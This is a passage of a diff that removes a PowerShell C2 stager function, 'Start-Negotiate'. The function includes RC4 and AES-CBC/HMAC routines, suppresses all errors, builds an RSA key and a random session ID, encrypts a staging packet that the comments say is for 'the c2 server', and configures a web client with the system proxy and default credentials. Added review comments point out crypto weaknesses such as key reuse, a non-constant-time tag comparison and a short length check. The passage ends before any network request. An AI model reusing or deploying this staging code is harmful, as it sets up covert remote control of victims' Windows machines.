- function Start-Negotiate {
- param($s,$PK,$UB='Mozilla/6.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
- function ConvertTo-RC4ByteStream {
- # RC4 keystream filter. -RCK is the key as a byte array, -In the byte array to
- # transform; one XOR'd byte per input byte is written to the pipeline. RC4 is
- # symmetric, so the same call encrypts and decrypts. Nothing here authenticates
- # the data: a flipped ciphertext byte flips the same plaintext byte unnoticed.
- Param ($RCK, $In)
- begin {
- # key scheduling: permute the 0..255 identity table using the key bytes,
- # cycling through the key with $_ % $RCK.Length
- [Byte[]] $Str = 0..255;
- $J = 0;
- 0..255 | ForEach-Object {
- $J = ($J + $Str[$_] + $RCK[$_ % $RCK.Length]) % 256;
- $Str[$_], $Str[$J] = $Str[$J], $Str[$_];
- };
- # reset both indices before keystream generation starts
- $I = $J = 0;
- }
- process {
- # keystream generation: one swap of the table per input byte
- ForEach($Byte in $In) {
- $I = ($I + 1) % 256;
- $J = ($J + $Str[$I]) % 256;
- $Str[$I], $Str[$J] = $Str[$J], $Str[$I];
- # emit input byte XOR keystream byte (the only output of this function)
- $Byte -bxor $Str[($Str[$I] + $Str[$J]) % 256];
- }
- }
- }
- function Decrypt-Bytes {
- # Decrypts a message laid out as IV(16) | AES-CBC ciphertext | HMAC-SHA256 tag
- # truncated to its first 10 bytes. -Key is a string whose ASCII bytes serve as
- # BOTH the HMAC key and the AES key; -In is the whole message as a byte array.
- # Outputs the plaintext bytes, or nothing at all when the input is 32 bytes or
- # shorter or when the tag does not match (there is no distinct error signal).
- param ($Key, $In)
- # NOTE(review): 16 (IV) + 16 (one block) + 10 (tag) = 42 bytes is the smallest
- # well-formed message, so this check admits shorter inputs that would then fail
- # inside TransformFinalBlock — confirm against the caller's error handling.
- if($In.Length -gt 32) {
- $HMAC = New-Object System.Security.Cryptography.HMACSHA256;
- $e=[System.Text.Encoding]::ASCII;
- # Verify the HMAC
- # tag = trailing 10 bytes; expected = first 10 bytes of HMAC over everything before it
- $Mac = $In[-10..-1];
- $In = $In[0..($In.length - 11)];
- $hmac.Key = $e.GetBytes($Key);
- $Expected = $hmac.ComputeHash($In)[0..9];
- # Compare-Object is an ordinary element-wise comparison, not a constant-time
- # MAC comparison; a non-empty difference list means the tag is rejected.
- if (@(Compare-Object $Mac $Expected -Sync 0).Length -ne 0) {
- return;
- }
- # extract the IV
- $IV = $In[0..15];
- # AesCryptoServiceProvider is preferred; RijndaelManaged is the fallback if
- # that type cannot be instantiated
- try {
- $AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
- }
- catch {
- $AES=New-Object System.Security.Cryptography.RijndaelManaged;
- }
- # CBC with the same ASCII key bytes used for the HMAC above (key reuse across
- # MAC and cipher); ciphertext is everything after the 16-byte IV
- $AES.Mode = "CBC";
- $AES.Key = $e.GetBytes($Key);
- $AES.IV = $IV;
- ($AES.CreateDecryptor()).TransformFinalBlock(($In[16..$In.length]), 0, $In.Length-16)
- }
- }
- # make sure the appropriate assemblies are loaded
- $Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
- $Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
- # try to ignore all errors
- $ErrorActionPreference = "SilentlyContinue";
- $e=[System.Text.Encoding]::ASCII;
- $customHeaders = "";
- $PKB=$e.GetBytes($PK);
- # set up the AES/HMAC crypto
- # $PK -> staging key for this server
- try {
- $AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
- }
- catch {
- $AES=New-Object System.Security.Cryptography.RijndaelManaged;
- }
- $IV = [byte] 0..255 | Get-Random -count 16;
- $AES.Mode="CBC";
- $AES.Key=$PKB;
- $AES.IV = $IV;
- $hmac = New-Object System.Security.Cryptography.HMACSHA256;
- $hmac.Key = $PKB;
- $csp = New-Object System.Security.Cryptography.CspParameters;
- $csp.Flags = $csp.Flags -bor [System.Security.Cryptography.CspProviderFlags]::UseMachineKeyStore;
- $rs = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 2048,$csp;
- # export the public key in the only format possible...stupid
- $rk=$rs.ToXmlString($False);
- # generate a randomized sessionID of 8 characters
- $ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 8);
- # build the packet of (xml_key)
- $ib=$e.getbytes($rk);
- # encrypt/HMAC the packet for the c2 server
- $eb=$IV+$AES.CreateEncryptor().TransformFinalBlock($ib,0,$ib.Length);
- $eb=$eb+$hmac.ComputeHash($eb)[0..9];
- # if the web client doesn't exist, create a new web client and set appropriate options
- # this only happens if this stager.ps1 code is NOT called from a launcher context
- if(-not $wc) {
- $wc=New-Object System.Net.WebClient;
- # set the proxy settings for the WC to be the default system settings
- $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
- $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
- }
- if ($Script:Proxy) {
- $wc.Proxy = $Script:Proxy;
- }